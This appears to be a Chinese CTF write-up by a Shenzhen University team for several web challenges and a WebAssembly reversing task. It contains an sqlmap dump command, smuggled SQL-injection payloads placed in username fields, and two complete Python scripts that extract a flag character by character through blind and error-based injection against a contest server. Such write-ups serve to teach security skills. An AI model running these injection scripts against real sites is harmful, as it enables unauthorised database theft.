上交大运维赛-深圳大学wp

原文引用 大专栏  https://www.dazhuanlan.com/2019/08/22/5d5e9b211840a/

刚拿到题目，做题时，一堆人在XSS，于是我也跟着去XSS

打到的cookie都是无用的，然后在登陆接口有报错

于是尝试报错注入

最终的payload

赛后经过sqlmap跑一下

1	python sqlmap.py -r C:1.txt --thread 10 -D bbs -T flag -C flag --dump

EIS{7879f0a27d8bcfcff0bcc837d7641e81}

SimpleExtensionExplorerInjection

题目说了XXE，跟flag的文档，并给了源码，但是题目提交的确实json格式

参考：https://blog.netspi.com/playing-content-type-xxe-json-endpoints/

按照文章中，构造exp

SimplePrintEventLogger

这题我不知道出题人是想要我们干嘛，结合上一题的XXE就可以任意文档读取了
参考:http://drops.xmd5.com/static/drops/tips-5290.html

SimpleServerInjection

直接参考：https://www.secpulse.com/archives/66934.html

SimpleBlog

这道题可能是这道比赛最精彩的web题了，还有一道待会吐槽

题目一开始在id这个点搞阿搞，一直在想怎么弄二次注入

然后在final Exam提交答案，发现相同答案得到的分数是随机的

直到下午4点，才发现注册用户名的时候，在得分这里，猜测后台会判断

1	where username='xxxxxx'

然后我们注册的时候发现

注册

1	Decade' or if(1,1,pow(6,666666))#

注册

1	Decade' or if(0,1,pow(6,666666))#

到这里才反应过来题目里面说的0分原来是这样弄到

下面直接上脚本

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66

#! coding:utf-8 import requests import sys if sys.getdefaultencoding() != 'utf-8': reload(sys) sys.setdefaultencoding('utf-8') def main(): url="http://210.32.4.20/register.php" chars = 'abcdefghijklmnopqrstuvwxyz_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ=+-*/{}?!:@#$%&()[],. ' result='' for i in range(1,50): i =str(i) for j in chars: j=ord(j) username = """decade'or if((ascii(substr((select flag from flag),%s,1))=%s), 1, pow(6,666666666666))#"""%(i,j) data = {'username': username, 'password' : 'aaa', } print username do_whlie = True while do_whlie: try: r=requests.post(url,data=data) #print r.status_code #print r.text if r.status_code == 200: do_whlie = False except Exception as e: print str(e) html = login_and_answer(username) #print html if 'Your grades is 0' not in html: result += chr(j) print result break #print r.text def login_and_answer(username): do_whlie = True while do_whlie: try: url="http://210.32.4.20/login.php" data = {'username': username, 'password' : 'aaa', } s = requests.Session() r1 = s.post(url,data=data) #print r1.status_code #print r1.text url='http://210.32.4.20/answer.php' data = {'10.a':'on'} r2 = s.post(url,data=data) #print r2.status_code #print r2.text #exit() if r1.status_code == 200 and r2.status_code == 200: do_whlie = False except Exception as e: print str(e) return r2.text if __name__ == "__main__": main()

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38

import requests,re import string register_url = "http://210.32.4.20/register.php" login_url = "http://210.32.4.20/login.php" answer_url = "http://210.32.4.20/answer.php" guess = "}{_"+string.digits+string.ascii_letters+"!@#$" # payload = "1' and if((ascii(substr((select flag from flag limit 0,1),1,1))={}),exp(~(select * from(select user())a)),1)#" flag = "" for i in range(1,50): print "round: "+ str(i) for j in guess: print "[+]testing: "+j tmp = ord(j) payload = "1' and if((ascii(substr((select flag from flag),{},1))={}),exp(~(select * from(select user())a)),1)#" print payload.format(i,tmp) data1 = { "username" : payload.format(i,tmp), "password" : "aaa" } data2 = { "9.d":"on" } re = requests.session() tt=re.post(register_url,data=data1) re.post(login_url,data=data1) res = re.post(answer_url,data2) if "<script>alert('Your grades is 0');</script>" in res.text: flag = flag+j break print "flag: "+flag

SimpleWasmReverse

这道题明摆着就是逆向题，然而web狗一窍不通，得到一个flag.wasm文档，然后因为逆向手粗心，当场没解出来，赛后pizza出洞，秒解，下面是wp（:逃
拿到wasm之后，用wasm2c工具转为c文档，再用gcc编译成.o，用ida打开

函数列表中找到可疑函数check()，稍做分析发现了函数f52，是base64加密函数，结合字符列表表中有似疑字符串aW9kan40NGgzOTNkNWZoNDtlOjloNmk1OThmNzk4O2dkPDRoZoA=，很明显是base64加密后的字符串。解密后为iodj~44h393d5fh4;e:9h6i598f798;gd<4hf€，再在check内容中分析，发现如下的代码：

1 2 3 4 5 6

while ( v14 != 38 ) { v4 = v14++; v5 = i32_load8_s(Z_envZ_memory, v4 + a1); f797(v21, (unsigned __int8)(v5 + 3)); }

可以看到，把每一位的数值加了3，解密后再-3就行了

1 2 3 4 5 6

a='aW9kan40NGgzOTNkNWZoNDtlOjloNmk1OThmNzk4O2dkPDRoZoA=' s='' a=a.decode('base64') for i in range(len(a)): s+=chr(ord(a[i])-3) print s

得到flag

总结

下次比赛再接再厉！深大加油！